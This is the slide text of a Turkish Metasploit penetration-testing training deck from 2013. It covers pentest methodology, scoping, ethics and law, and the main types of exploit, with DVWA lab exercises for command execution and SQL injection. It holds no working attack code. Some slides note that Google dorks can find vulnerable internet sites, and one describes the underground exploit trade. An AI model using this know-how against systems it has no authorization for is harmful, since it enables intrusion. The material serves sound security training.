Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Metasploit Framework Eğitimi

7,212 views

Published on

Metasploit Framework Eğtiimi - 2013 @BGASecurity

Published in: Technology

Metasploit Framework Eğitimi

  1. 1. @BGASecurity BGA | Metasploit @BGASecurity Metasploit Framework Pentest Eğitimi 2013
  2. 2. @BGASecurity BGA | Metasploit @BGASecurity BGA Bilgi Güvenliği A.Ş BGA Security Hakkında BGA | Hakkında Siber güvenlik dünyasına yönelik, yenilikçi profesyonel çözümleri ile katkıda bulunmak amacı ile 2008 yılında kurulan BGA Bilgi Güvenliği A.Ş. stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında büyük ölçekli çok sayıda kuruma hizmet vermektedir. Gerçekleştirdiği vizyoner danışmanlık projeleri ve nitelikli eğitimleri ile sektörde saygın bir yer kazanan BGA Bilgi Güvenliği, kurulduğu günden bugüne kadar alanında lider finans, enerji, telekom ve kamu kuruluşları ile 1.000'den fazla eğitim ve danışmanlık projelerine imza atmıştır. ARGE EĞİTİM MSSP PENTEST SOME / SOC SECOPS
  3. 3. @BGASecurity BGA | MetasploitEğitim Hakkında Metasploit Framework Pentest Eğitimi, pentest çalışmalarının en önemli adımlarından olan sistemlere sızma ve ilerleme süreçlerinin nasıl gerçekleştirildiğini, sonuçlarını ve kullanılan araçları uygulamalı olarak anlatan eğitimdir.
  4. 4. @BGASecurity BGA | MetasploitEğitim Notları • Tamamen Türkçe ve BGA eğitmenleri tarafından hazırlanmıştır. • Kitabi şekilde değil sunum şeklindedir. - Okunması ve anlaşılması daha kolay olduğu için • Bazı konu başlıkları sadece eğitim notlarında yer almaktadır(self study). • Eğitmen notları ile katılımcı notları aynı değildir. Katılımcı notları çok daha detay içermektedir. • Eğitim notları ile ilgili geri bildirimleriniz için egitim@bga.com.tr adresine e-posta gönderebilirsiniz.
  5. 5. @BGASecurity BGA | MetasploitTanışma
  6. 6. @BGASecurity BGA | MetasploitParola:Ezber Değil Mantık
  7. 7. @BGASecurity BGA | MetasploitDers Program
  8. 8. @BGASecurity BGA | MetasploitEğitim Neler İçerir/Neler İçermez Eğitim Neler İçerir Metasploit araçlarının etkin kullanımı, hacking öncesi ve sonrası yardımcı araçları, exploiting sonrası çalışacak payloadları ve hedef sistemde yetki yükseltme, ilerleme, iz silme gibi konular gerçek dünyada örneklerle uygulamalı olarak işlenmektedir. Eğitim Neler içermez; Güvenlik zafiyetini ortaya çıkarma, exploit geliştirme, ShellCode ve Payload yazımını içermez. Bu konular için bakınız: Exploit Geliştirme Eğitimi.
  9. 9. @BGASecurity BGA | MetasploitHatırlatmalar • Programların arayüzü değişir, komut satırına aşinalık gösterin. • Not almakdan kaçının, eğitim notlarında ve kaynaklarda fazlaca detay var. Uygulamaya ağırlık gösterin. • Eğitim ileri düzey uygulamalı bir eğitimdir, yaşanacak teknik sorunlar bu eğitimin bir parçasıdır. Çözümleyici ve uzlaşıcı yaklaşımlar gösteriniz. • Eğitim boyunca, ses ve video kaydı almak yasaktır !
  10. 10. @BGASecurity BGA | MetasploitLab. Ortamı • İşletim sistemleri, vmware veya virtualbox sanallaştırma ortamlarında kullanılacaktır. • Win2k8, Win2k3, Win7, Winxp, Linux, FreeBSD, MacOSX işletim sistemleri lab. ortamında kuruludur. • Çalışmalar, Backtrack5 R2 dağıtımı üzerinde yapılacaktır. • Switc ve router ihtiyaçları için gns3lab kullanılacaktır.
  11. 11. @BGASecurity BGA | MetasploitEğitim İçeriği • Exploit Nedir ? • Exploit Türleri • Örnek Exploitler • Exploit Frameworkleri • Payload Nedir? • Shellcode Nedir ? • Encoder Nedir ? • Nop Nedir ? • Auxiliary Nedir? • Metasploit Framework Projesi • Metasploit Kurulumu • Gelişmiş Payload ve Eklenti Modülleri • Auxiliary Modülleri • Metasploit Araçlarını Anlamak • Metasploit Framework ile Pen-Test • Dradis Framework • Client Side Saldırı Yöntemleri • Exploit Sonrası Sistemde Nasıl İlerleriz ? • Erişimi Sürdürme Yöntemleri • İleri Metasploit Kullanımı • Metasploit Ötesi Hacking Araçları
  12. 12. @BGASecurity BGA | MetasploitKontrol Listesi • Vmware (workstation veya player ) kurulumu • DHCP ile IP Adresi alındı mı ? • İfconfig -a • İnternet bağlantınız var mı ? • Ping www.google.com • Windows kullanıcıları vmware yazılımını administrator hakları ile Linux kullanıcıları root yetkileri ile çalıştırdı mı ?
  13. 13. @BGASecurity BGA | Metasploit @BGASecurity I.Bölüm Pentest
  14. 14. @BGASecurity BGA | MetasploitGenel Kavramlar Pentest, Penetration Test, Vulnerability Assessment, audit, configuration review, White/Black/Gray box pentest, white/black hat hacker, ddos, phishing, social engineering, metasploit, port scanning, os fingerprinting, service identification, vulnerability, exploit, scr1pt k1dd13, google hacking, ip fragmentation, nessus, nmap, metasploit, osstmm, issaf, heap, stack, dep, kernel, rootkit, web shell, tunneling…
  15. 15. @BGASecurity BGA | MetasploitBilişim Sektöründe Pentest Bilişim Dünyası Güvenlik Audit Pentest Firewall/IPS Ağ Yönetimi ….
  16. 16. @BGASecurity BGA | MetasploitPenetration Test/PenTest • Çeşitli yazılım ve yöntemler kullanarak hedef sistemlere sızma girişimlerine verilen ad • Literatürde Sistem sızma testleri/güvenlik testleri olarak da geçer. • «Gerçek pentest»lerde hedef sisteme sızmak için her yol meşrudur. • Hackerlar için • Sosyal yaşamdaki karşılığı • Askeri tatbikatlar • Siber tatbikatlar(?)
  17. 17. @BGASecurity BGA | MetasploitVulnerability Assessment • Zaafiyet Analizi/ Zayıflık Taraması • Otomatize araçlar kullanarak sistem güvenliğinin teknik açıdan incelenmesi ve raporlanması • Uzman seviye teknik bilgi gerektirmez • False positive seviyesi önemlidir • Otomatize araçlar akıllı sistemler değildir • Rapor çok detaylı olursa gerçek riski bulmak o kadar zor olur • eksik yama, hatalı konfigürasyon, güvenlik zafiyeti barındıran yazılım versiyonu bulmak için yapılır • Gerçekleştirmek kolay, sonuçlarını yorumlamak zordur • Örnek rapor: MSSQL’de X zaafiyeti var? Sonrası…
  18. 18. @BGASecurity BGA | MetasploitVA Neden Yetersizdir? • Otomatize araçlar kullanılarak gerçekleştirildiği için gerçek riski ortaya çıkarmaz • Saldırgan sisteminize ne zarar verebilir sorusunu cevaplayamaz! • Test edilen sistem/bileşenler arasında ilişki kuramaz • Firewall’daki X portu açık, Y sisteminde Z zaafiyeti var. • X portundan Y sistemine erişilip sistem ele geçirilebilirken VA sistemi her iki zaafiyeti farklı farklı bildirir. • Çeşitli sebeplerden dolayı hatalı sonuçlar üretebilir • Varsayılan ayarlarla kullanıldığında false negative oranı artar • Kötü adamlar nessus kullanmaz • Bir saldırganın ağınıza yönelik neler yapabileceğini göstermez. • Bileşenler arası güven ilişkilerinin nasıl kötüye kullanılacağını göstermez. • False positive ihtimali yüksektir. • Elle doğrulanması gerekir. • Sınırları belirlidir. • Tek bir sisteme yöneliktir, bir sistemden başka sistemlere etkiyi göstermez. • VA pentest için bir baseline sağlar.
  19. 19. @BGASecurity BGA | MetasploitPentest & Vuln. Asses. Farkı • Zaafiyet taramada amaç teknik güvenlik açıklıklarının bulunmasıdır. • Genellikle yüzeysel testlerdir • Pentest’de amaç gerçek hayattakine benzer şekilde sistemleri ele geçirmeye çalışmaktır • Birinde yazılım diğerinde tecrübe söz sahibidir • Zaafiyet tarama Pentest çalışmalarının Bir kısmını içerir • Pentest KAPSAR Vuln.Assessment
  20. 20. @BGASecurity BGA | MetasploitAudit • Tetkik, denetim • Sistemlerin yazılı bir dökümana bağlı kalarak detaylı bir şekilde gözden geçirilmesi ve uygunsuzlukların saptanması • Genellikle bir standarta uyumluluk için gerçekleştirilir ve kontrol listeleri(checklists) kullanılır • En fazla bulguyu ortaya çıkaran yöntemdir • Uzman seviyesi teknik bilgi gerektirmez • Düz bakış açısı olduğu için kompleks zaafiyetleri bulmak zordur
  21. 21. @BGASecurity BGA | MetasploitPentest, Vuln. As., Audit Karşılaştırması Pen Test Vuln Assess Audit Verilen Bilgi/Yetki Sınırlı/Sınırlı Sınırlı/Sınırsız Sınırsız/Sınırsız Sonuçları Sisteme sızma, iç ağa erişim Zaafiyetlerin listelenmesi Sistem uygunsuzlukları Lokasyon İç ve Dış Dışarıdan Sistem üzeri Zaman Orta Kısa Uzun
  22. 22. @BGASecurity BGA | MetasploitNeden Pentest? • Internetten gelecek siber saldırılara karşı ne kadar korunaklısınız? • Modern risk ölçümü • Checklist tabanlı kontroller zaman aşımına uğrar(Audit) • Çoğu şirket güvenlik sertifikalarını(iso 27001 vs kağıt üzerinde almak için uğraşır -Türkiye'den güncel örnek • Standartlar kompleks tehditlere karşı yetersiz kalmaktadır. • PCI, HIPAA gibi standartlar Pentest yaptırmayı zorunlu tutmaktadır • Teori ile pratik arasındaki fark teori ile pratik arasındaki fark kadardır!
  23. 23. @BGASecurity BGA | MetasploitPentest ROI(ROI(Return Of Investment) • Pentest projeleri genellikle «ek masraf» kategorisindedir • Bunun temel sebebi Pentest projelerinin üst yönetime iyi anlatılamamasıdır • Kazanç odaklı bakış açısı: Başkaları benim sistemleri test edip zaafiyetlerimi söylediğinde ben ne kazanacağım? • El-cevap: Başkaları sistemdeki zaafiyetleri kullanarak sisteme sızarsa ne kaybederiz? • Para? • Prestij? • Güç? • Pentest projeleri yapılırken mutlaka bunun şirkete olan katkısı ön plana çıkarılmalıdır
  24. 24. @BGASecurity BGA | MetasploitPentest Çalışmalarında Sık Yapılan Hatalar • Pentest'i sadece çeşitli araçlar kullanarak zaafiyet tarama şeklinde geçiştirme • Test kapsamı belirlenirken çeşitli sistemleri hariç tutma • Özellikle bu sistemler internete açıksa ... • Kontrol testlerinin eksik bırakılması • Ucuz iş gücünün seçilmesi • Ucuz iş gücü = otomatize zaafiyet tarama sonuçları • İstemci güvenliğine yönelik testler ve sosyal mühendislik testleri genellikle önemsenmemektedir. • Sınır güvenliği bileşenleri teste tabi tutulmamaktadır • Firewall, IPS, WAF vs.
  25. 25. @BGASecurity BGA | MetasploitPentest Hakkında Eksik/Yanlış Bilinenler • Pentest yaptırmak sistemlerin güvenliğini arttırır • Dolaylı yoldan arttırır • Pentes'i bir kere yaptırmak yeterlidir • Pentest çalışmasını iç kaynak kullanarak yaptırmak daha güvenlidir • Pentest hackerların ne bulabileceğini bize gösterir • Hackerların sınırı yoktur, kapsamı yoktur • En önemli sistemlerimi pentestden geçirmek yeterlidir.
  26. 26. @BGASecurity BGA | MetasploitPentest Çalışmalarında Amaç? • Gerçek riskin teknik olarak ortaya çıkarılmasıdır • Sadece zaafiyetlerin bulunup bırakılması değildir! • Türkiye’deki pentest projelerinin %99’u vuln. Asses. olarak değerlendirilmektedir.
  27. 27. @BGASecurity BGA | MetasploitPentest Paradox • Pentest sonuçları iki taraftan birini mutlu diğerini mutsuz edecektir. • Pentest çalışmalarını bir challenga dönüştürmemek lazım. • Pentest'de amaç gerçek riskin ortaya çıkarılmasıdır. Bulunan açıklar pentest firmasını sevindirdiği kadar firmayı da sevindirmeli (başkaları bulmadan önce bulduk diye) • Pentest sonuçları %100 güvenilir değildir. • Pentest ekiplerinin moral ve motivasyonu Pentest amacı üstte tutularak devamlı kontrol edilmeli ve moral depolanmalı
  28. 28. @BGASecurity BGA | MetasploitPentest Yöntemleri Pentest Black BOX White BOX Gray BOX
  29. 29. @BGASecurity BGA | MetasploitBlacbox Pentest Yöntemi • Teste tabi tutulacak sistem hakkında ip adresi, kurum ismi vs gibi temel bilgiler haricinde ek bilgi bulunmaması • Amaç: dışardan bir göz sistemle ilgili neler görebilir, nerelere ulaşabilir • En gerçekci güvenlik test yöntemidir • Çok tercih edilmez • Neden? • Hackerların zaman kısıtı yoktur, pentest projelerinde zaman kısıtlaması vardır
  30. 30. @BGASecurity BGA | MetasploitWhitebox Pentest Yöntemi • Teste tabi tutulacak sistemlere ait tüm detay bilgilerin paylaşılması • Kaynak kodlar • İç ip yapılanması • Hangi sistemlerin hangi yazılımlarla çalıştığı bilgisi • İşletim sistemi bilgileri • En fazla bilgi bu test sonucunda ortaya çıkar • Tam bir pentest gibi sonuç vermez • Neden? • Detay bilgi olması testi yapanların körelmesi demektir
  31. 31. @BGASecurity BGA | MetasploitGraybox Pentest Yöntemi • White box ve black box testlerin arasında konumlanan test yöntemi • Teste tabi tutulacak sistemlere ait bilgilerin paylaşılır fakat testin yine agresif yöntemlerle yapılması sağlanır • Sık tercih edilen yöntemlerdendir.
  32. 32. @BGASecurity BGA | MetasploitMeslek Olarak «Pentest» • Zengin işi(!) • Zor aynı zamanda zevkli • Bitmek bilmeyen bir okuma ve deneme serüveni • Sistem/ağ admin = %20 araştırma %80 operasyon • Pentester = %80 araştırma %20 operasyon • En az bir konuda uzmanlık(Networking, DB, development, system adm. …) gerektirir • Her konuda uzmanlaşmak mümkün değildir • Uzmanlık: Ortalama 4-5 yıl bir konu üzerinde çalıştıktan sonra kazanılır • Araçlar hayat kurtarıcıdır ama herşey değildir! • Perl, Python, Ruby gibi programlama dillerinden birine hakimiyet.
  33. 33. @BGASecurity BGA | MetasploitPentest Ekipleri Nasıl Olmalı? • Pentest ekip işidir • En az üç kişiden oluşmalıdır • Proje yöneticisi (+bir konuda uzman) • Yedekli çalışma(1+1) • Her konuda uzman kişi bulmak imkansız • Web+veritabanı+networking+exploit geliştirme+…. • Tek kişiden oluşan pentest ekipleri çok kabul görmez • Türkiye’de genellikle tek kişilik pentest ekipleri iş yapar • Ekip çalışmalarında mutlaka bir metodoloji takip edilmeli • Ekiplerin çalışma süresince bulgularını paylaşacakları ortam/yazılım gereksinimi • Dradis pentest framework gibi. • Red team blue team vs tiger team
  34. 34. @BGASecurity BGA | MetasploitPentest Ekibi Nasıl Kurulur • Pentest ekipleri hem hizmet veren hem de kurumsal şirketler için gereklidir • En az 3 yıllık güvenlik sektörü deneyimi • Eğitimler hızlandırıcı rol oynar • En az bir programlama diline hakimiyet olmalı • Kurulacak ekip için uzmanlık alanlarına göre yol haritası belirlenmeli • Merak en önemli unsurdur!
  35. 35. @BGASecurity BGA | MetasploitPentest Ekibi Özellikleri • En önemli bileşen etik değerlere olan bağlılıktır. • Etik>Bilgi değerlidir. • Ekiplerin pentest çalışması ve edinilen bilgilerle ilgili hassasiyeti çok derin olmalı. • Kötü örnek: pentest çalışmasında e-posta listelerine gönderilen maillerde firmaya ait bilginin bulunması. • Pentest yöneticisinin onayı olmadan pentest kapsamıyla ilgili LAN haricinde bilgi paylaşımının gerçekleştirilmemesi. • 3-4 kişilik ekip olabilir. Gerektiğinde bilgi olarak danışılabilecek dışardan uzmanlar... • Pentest ekiplerinin ön bir eğitimden geçmesi gerekir. (Teknik olarak değil)
  36. 36. @BGASecurity BGA | MetasploitBaşarılı Pentest İçin Üç Bileşen Tecrübe Yorumlama Araç kullanımı
  37. 37. @BGASecurity BGA | MetasploitPen-test Çeşitleri Pentest İç Pentest Dış Pentest Hibrid Pentest
  38. 38. @BGASecurity BGA | Metasploitİç(Internal) Pentest • Amaç: Şirket içinden birinin veya şirketin iç ağına sızabilen birinin neler yapabileceğinin ortaya çıkartılması • Şirket çalışanlarına yönelik saldırıları • Sosyal mühendislik saldırıları • Phishing saldırıları • Şirket çalışanlarının yapabileceklerinin simule edilmesi
  39. 39. @BGASecurity BGA | Metasploitİç Pentestlerde Sık Yapılan Hatalar • Ağ altyapı güvenliğinin test edilmemesi • Ağ altyapısı güvenli değilse üzerine çalışan uygulamalarda güvenlik önlemi almak işe yaramaz • MITM tehlikesi olan bir ağda WEB sunucuya yama geçilmesi çok önemli değildir. • Öncelik ağ altyapısının güvenliği olmalıdır.
  40. 40. @BGASecurity BGA | MetasploitDış(External) Pentest Network Pentest Wireless Pentest Client Side Pentest DDoS Test Web App. Pentest Şirketin dışardan risk haritasının çıkartılması amaçlı gerçekleştirilir. Hangi pentest daha önemlidir? Web? Network? Wireless? ….
  41. 41. @BGASecurity BGA | MetasploitDış Pentestlerde Sık Yapılan Hatalar • DDoS testlerinin gerçekleştirilmemesi • DDOS= erişilebilirlik=Güvenliğin en temel amacı! • Kapsam dışı bırakılan sistemler • Hackerlar için kapsam kavramı yoktur!
  42. 42. @BGASecurity BGA | MetasploitPentest Teknik Konu Başlıkları • Web Application Pentest • Network Pentest • Wireless Pentest • Mobile System/Application Pentest • Cloud/Virtulization Pentest • DDoS Pentest • Client Side Pentest
  43. 43. @BGASecurity BGA | MetasploitPentest Öncesi Yapılması Gerekenler • Firewall, ips den izin • Zorunlu değildir • Firmanın kalitesi ölçülmek isteniyorsa Firewall/IPS ‘den «özel» izin verilmemelidir • Şirket içi bilgilendirme mailleri toplantisi ve kontaklar • Kapsam belirleme amaçlı toplantılar • Pentest yapılacak zaman dilimlerini belirleme • DDoS testleri gece saatlerinde gerçekleştirilmeli • Kişisel firewall/güvenlik sistemlerinin devre dışı bırakılması
  44. 44. @BGASecurity BGA | MetasploitKapsam Belirleme • Saldırganlar için kapsam kavramı yoktur • Hattı müdafaa değil sathı müdafaa yapılmalıdır (o satıh tüm sistem olmalıdır) • Envanter çalışması • Kapsamı pentest firmasının çıkarması • Kapsam çalışmasında müşteriye ve pentest firmasına düşen görevler nelerdir?
  45. 45. @BGASecurity BGA | MetasploitKapsam Belirlemede Yardımcı Sorular • İç test mi dış test mi? • Wireless var mı? • Şirketin online kalması elzem mi? • En önemli veri nedir? • Müşteri verileri var mı? • İç ağa misafirler geliyor mu? • Şirketi medyaya çıkaracak haberler ne olabilir?
  46. 46. @BGASecurity BGA | MetasploitKapsam İçi Fakat Şirket Dışı Sistemlerin Durumu • Firmanın verdiği kapsam içerisinde firmaya ait olmayan sistemler olabilir • Mail sunucu hosting firmasında tutuluyordur gibi.. • Bu durumlarda hosting ile firmanın görüşülmesi daha uygundur • Görüşmeleri pentest firması değil hizmet alan firma gerçekleştirmelidir
  47. 47. @BGASecurity BGA | MetasploitFull Scope Pentest(a.k.a Hack Us!) • Pentest gerçekletirecek firmaya sadece firma isim ve ana sayfa bilgisi verilir. • Süre kısıtlıdır • Amaç tüm bilgiler ve sistemler kullanılarak internet üzerinden sisteme sızma gerçekleştirilebiliyor mu sorusunun cevabını bulmak • Amaç açıklık bulmak değil, bulunan açıklıklardan sistemlere sızma deneyimleridir • Raporu diğer pentest çalışmalarına göre daha kısa olur • Gereksiz detaylar çıkarılarak sadece sisteme sızmaya izin verecek bileşenler yazılır
  48. 48. @BGASecurity BGA | MetasploitPenetration Test Zamanı • Sistemi aksatabilecek tüm testler çalışma saatleri dışında gerçekleştirilmeli • Testler başladığında mutlaka test yapan firmadan bir kontak olmalı • Aksaklıkların anında bildirilmesi için
  49. 49. @BGASecurity BGA | MetasploitFirmanın Yetkinliği Nasıl Ölçülür • Pentest yapacak firmanın yetkinliği test sonuçlarının güvenilir olması açısından oldukça önemlidir • Pentest yaptırdıktan sonra hacklenirse sistem kim sorumlu olur? • Firma Yetkinliği belirleme için temel yöntemler: • Pentest ekibinin CV’si • Daha önce pentst yapılan firmalar (referanslar) • Tuzak sistem kullanarak
  50. 50. @BGASecurity BGA | MetasploitFirma Seçimi Konusunda Dikkat Edilecek Hususlar • Pentest projesinin en önemli adımlarından biridir • Seçilen firma ne kadar kaliteliyse ortaya çıkacak rapor da o oranda sağlıklı olur. • Pentest sonrası hacklenen şirketler…? • Penetration test firmanın özel işi mi yoksa oylesine yaptığı bir iş mi? • Firmaya daha önceki referanslarını sorun ve bunlardan birkaçına memnuniyetlerini sorun. • Firmadan daha önce yaptığı testlerle ilgili örnek raporlar isteyin. • Firmada test yapacak çalışanların CVlerini isteyin http://blog.lifeoverip.net/2009/10/06/10-soruda-pentestpenetrasyon-testleri/
  51. 51. @BGASecurity BGA | MetasploitPentest’de Yapılmayacaklar Listesi • Brute force denemelerini dikkatli gerçekleştirmek gerekir. • Hesap kitleme riski olan yerlere yönelik brute force denemeleri kontrollü gerçekleştirilmeli • Sistemlerde bulunan açıkları istismar için exploit çalıştırmadan önce test sistemlerinde mutlaka denenmeli • Bazı exploitler sistemin çalışamaz hale gelmesine neden olabilir • MITM denemeleri • İzin almadan gerçekleştirilecek MITM denemeleri networkün çalışmas hale gelmesine neden olabilir • Test kapsamında dışardan firma izni olmadan üçüncü partileri teste dahil edip sistemlere erişim izni vermek
  52. 52. @BGASecurity BGA | MetasploitExploit Çalıştırma Denemesi Sistem Crash
  53. 53. @BGASecurity BGA | MetasploitPentest Lab İhtiyacı • Pentest çalışmalarında riskli denemeler için lab ortamının hazır olması gerekir. • BGA Pentest lab ortamında 45 adet makine bulunmaktadır. • Bu makineler her tür işletim sistemi ve yazılımın sürümlerini içermektedir. • Bir sürümdeki zafiyet önce lab ortamında denenir ve sisteme zarar vermediği belirlenirse gerçek ortamlarda denenir.
  54. 54. @BGASecurity BGA | MetasploitPentest Sonrası Yapılacaklar Listesi • Pentest projelerinin en önemli kısmı sonuçların değerlendirilmesidir. • Aynı açıklık 3 sene boyunca farklı pentest sonuçlarında gözüküyorsa testler sadece yapılmış demektir. • Pentest raporlarının üst yönetimle paylaşılarak açıklıkların giderilmesinde yönetim desteğinin alınması. • Sistem yöneticileri/yazılımcılarla toplantı yapıp sonuçların paylaşılması • Sonuçlarının basit açıklıklar olarak değil, bir risk haritası kapsamında yönetime sunulması(bu açıklık hackerlar tarafından değerlendirilirse şu kadar kaybımız olur gibisinden) • Her bilgi aynı değerde olmadığı gibi her zaafiyet de aynı değer de değildir. • Açıklıkların kapatılmasının takibi • Bir sonraki pentestin tarihinin belirlenmesi
  55. 55. @BGASecurity BGA | MetasploitPentest Raporlaması • Pentest verilerinin mutlaka diskte şifreli olarak saklanması gerekir • Örnek olay: • Pentest raporlarının ilgili kişiye iki aşamalı şifre ile iletilmesi gerekir. • E-posta+SMS, telefon üzerinden şifre
  56. 56. @BGASecurity BGA | MetasploitMetodoloji • Pentest sonuçlarında firmanın size olan güvenini arttırmaya yarar. • Neleri nasıl kontrol ettiğinizin belgesidir. • Kötü örnek: neleri kontrol ettiği bilinmiyor ortada birşey yok • Neleri kontrol ettiği biliniyor ve ortada birşey yok (daha güvenilir bir rapor) • Pentest gerçekleştirilen firmanın bilgi seviyesini sorgulamak pentest aşaması veya rapor zamanında yapılmaz • Başka firmalardan alınacak metodolojiler geliştirilebilir. • Yaşayan bir döküman olmalı
  57. 57. @BGASecurity BGA | MetasploitPentest Standartları • Pentest sonuçlarının tekrarlanabilir ve doğrulanabilir olması için standartlara uyumlu olması gereklidir. • Pentest konusundaki standartlar • OSTTM(Open Source Security Testing Methodology Manual) • ISSAF(Information Systems Security Assessment Framework) • OWASP • NIST SP800-115 • EC Council’s LPT • Penetration Testing Framework • http://www.vulnerabilityassessment.co.uk/
  58. 58. @BGASecurity BGA | MetasploitOSSTMM • Open-Source Security Testing Methodology Manual • Version 2.0 -> www.osstmm.org • Teknik detaylara çok girmeden bir pentest sürecinin nasıl yürütülmesi gerektiğini anlatır. • Teorik dökümandır • Her pentest yapan uzmanın Bilmesi gereken maddeleri içerir.
  59. 59. @BGASecurity BGA | MetasploitOWASP • Owasp testing guide • Teknik detay içermez yol, yöntem göstermek amaçlıdır • Sadece uygulama testlerine yöneliktir.
  60. 60. @BGASecurity BGA | MetasploitISSAF ISSAF (Information Systems Security Assessment Framework )
  61. 61. @BGASecurity BGA | MetasploitVuln.Ass.Co.uk
  62. 62. @BGASecurity BGA | MetasploitPentest Proje Planı • Pentest çalışmasından max. Fayda elde edebilmek için öncelikle sağlam bir plan yapılmalıdır • Plan için şu sorular kullanılabilir: • Pentest’in kapsamı ne olacak? • Sadece iç ağ sistemleri, uygulamaları mı yoksa tüm altyapı mı test ettirmek isteniyor • Testleri kime yaptıracağım? • Ne kadar sıklıkla yaptırmalıyım? • Riskli sistem ve servisler kapsam dışı olmalı mı yoksa riski kabul edip sonucunu görmeli miyim? • DDOS denemesi yapılacak mı? • Firma ile NDA anlaşması
  63. 63. @BGASecurity BGA | MetasploitPremature Termination • Pentest çalışmasının belirlenenden önce bitirilmesine neden olabilir? • Çalışmalar kapsamında networksel ve sistemsel problemlerin oluşması • IDS vs sistemlerinde ciddi alarmların üremesi • Sistemlerdeki kişilere gereksiz onlarca mailin gitmesi • Sisteme girdiğinizi bilen firmanın tamam yeter demesi • Sisteme girdiğinizde sisteme daha önceden birilerinin girdiğinin farkedilmesi!! • Acil açıklık keşifleri • Firma tarafında gerçekleştirilebilecek sistem çalışmaları
  64. 64. @BGASecurity BGA | MetasploitGüvenlik Testlerinin Yasal Durumu • Güvenlik taraması yapmak suç mudur? • Başkalarının sistemlerini öğrenme amaçlı kurcalama • T.C.K ve bilişim suçları • NDA imzalanması • Yasal pentestlerde ilk yapılması gereken işlem • Her iki tarafı da ek yükümlülüklerden korumak içindir. • Sayfanızda açıklık buldum diyen birine karşı verilecek cevap: • Teşekkür & uyarı • Hukukü süreç başlatma
  65. 65. @BGASecurity BGA | Metasploit @BGASecurity II.Bölüm Exploit Çalıştırma
  66. 66. @BGASecurity BGA | MetasploitSistemlere Sızma Yöntemleri • Günümüzde açıklıklar yoğun olarak network seviyesinde iki port üzerinde gözükmektedir (80/443) • Uygulama seviyesi güvenlik zafiyetleri kullanılarak işletim sistemi, LAN ve DMZ bölgeleri ele geçirilebilir. • Gerekli önlemler alınmadığı durumlarda • Sistemlerde açıklık bulma, açıklığı istismar etme ve sistemi ele geçirme farklı adımlardır ve farklı alanlarda uzmanlık ister.
  67. 67. @BGASecurity BGA | MetasploitExploit|Genel Kavramlar • Exploit nedir? • Exploit çeşitleri • Hangi dille yazılır ? • Exploit araştırma teknikleri • Yazması zor mudur? • Exploit Frameworkleri
  68. 68. @BGASecurity BGA | MetasploitExploit Nedir? • Exploit (Ingilizce to exploit - kötüye kullanmak) bir bilgisayar programı veya bir script, bilgisayar programlarında bulunan zayıflık veya hatalar için kullanılır. • Vikipedia http://en.wikipedia.org/wiki/Exploit_(computer_security) • Teknik olarak , pentest çalışmalarında ya da siber saldırılarda varolan bir güvenlik zafiyetini istismar ederek sisteme sızmaya yol açacak yazılım/script.
  69. 69. @BGASecurity BGA | MetasploitExploit Çeşitleri • Farklı amaçlarla kullanılan exploit çeşitleri vardır • Exploit çeşitlerinden bazıları • Local Exploits • Remote Exploits • Dos-Exploits • Command-Execution-Exploits • SQL-Injection-Exploits • Zero-Day-Exploits
  70. 70. @BGASecurity BGA | MetasploitRemote Exploits • Sistemlere sadece uzaktan erişilerek çalıştırılabilen exploit çeşidi. • Bu exploit çeşidinde hedef sisteme ağ üzerinden bağlantının olması yeterli olmaktadır. • Web tabanlı ya da network tabanlı olabilir.
  71. 71. @BGASecurity BGA | MetasploitLocal Exploits • Sadece uzaktan erişimin yeterli olmadığı, hedef sistem üzerinde yetkili/düşük yetkili sistem hesabı gerektiren exploit çeşidi. • Linux kernel exploitleri bu exploit tipine en iyi örnektir. • İstismar kodunu çalıştırabilmek için Linux sistem üzerinde komut çalıştırabilmek gerekir.
  72. 72. @BGASecurity BGA | MetasploitDoS Exploits • Çalıştırıldığında hedef sisteme erişim izni vermeyen fakat hedef sistemin çalışamaz, erişilemez hale gelmesini sağlayan exploit çeşidi. • Tehlike seviyesi diğerlerine göre daha düşüktür.
  73. 73. @BGASecurity BGA | MetasploitCommand Execution Exploits • Daha çok web uygulamaları için kullanılan bir kavram. • Web uygulamasındaki bir güvenlik zafiyetini işletim sisteminde komut çalıştıracak şekilde istismar etme. • Web uygulamalarının sadece web /uygulama katmanını değil tüm sistemi etkileyeceğinin en önemli örneklerindendir. • Web uygulamaları harici genel uygulamalarda da görülebilir fakat günümüzde bu oran istisna denilecek kadar azdır.
  74. 74. @BGASecurity BGA | MetasploitUygulama| Command Execution Exploit • Hedef sistem DVWA • Amaç: Linux ve Windows sistemlerde kod çalıştırma açıklıklarının istismar edilmesiyle işletim sisteminin ele geçirilebileceğinin gösterilmesi. • Windows sistemlerle Linux sistemler arasında temel bazı farklar bulunmaktadır • Linux sistemlerde Apache sıradan bir kullanıcı hakkıyla çalışır • Windows sistemlerde yetkili kullanıcı hakkıyla çalışır • İnternette kod çalıştırma açığı barındıran siteler “Google dorks” yardımıyla bulunabilir.
  75. 75. @BGASecurity BGA | MetasploitSql Injection Exploits • Sqli barındıran sistemlere yönelik gerçekleştirilen ve amacı hedef sistemde arka kapı oluşturmak, hedef sistemden bilgi almak olan saldırı tipi. • Genellikle sqlmap, havij,pangolin gibi araçlar kullanılır. • Başarılı bir saldırı sonrası SQLi üzerinden hedef sistem ele geçirilebilir.
  76. 76. @BGASecurity BGA | MetasploitSQLi Uygulaması • Hedef sistem DVWA • Amaç hedef sistem üzerinden bilgi alma, hedef sisteme yetki dahilinde backdoor yerleştirme • Kullanılan araç Sqlmap • Sqli zafiyetleri internet üzerinden Google yardımıyla bulunabilir.
  77. 77. @BGASecurity BGA | Metasploit0 day Exploit • Açığı bulan kişi/grup açıklığı firmaya bildirmeden exploitini yazarak yayınlar/satar. • Exploiti firma ile saldırganlar aynı anda haberdar olur ve bir yarış başlar.
  78. 78. @BGASecurity BGA | MetasploitExploit Araştırma Kaynakları • Exploitler iki şekilde elde edilebilir: • Google ve benzeri arama motorları kullanarak genele açık, yayınlanmış exploitler bulunabilir. • Sadece belirli kişilerin üye olabileceği underground forumlarda, IRC odalarında ve dışa kapalı e-posta listelerinde • Değerli exploitler genellikle genele açılmadan önce 2-3 aylık bir satış –özel kullanım- süreci yaşarlar. • Exploit sat-al işlemi ciddi paralar kazandıran bir ticaret biçimidir.
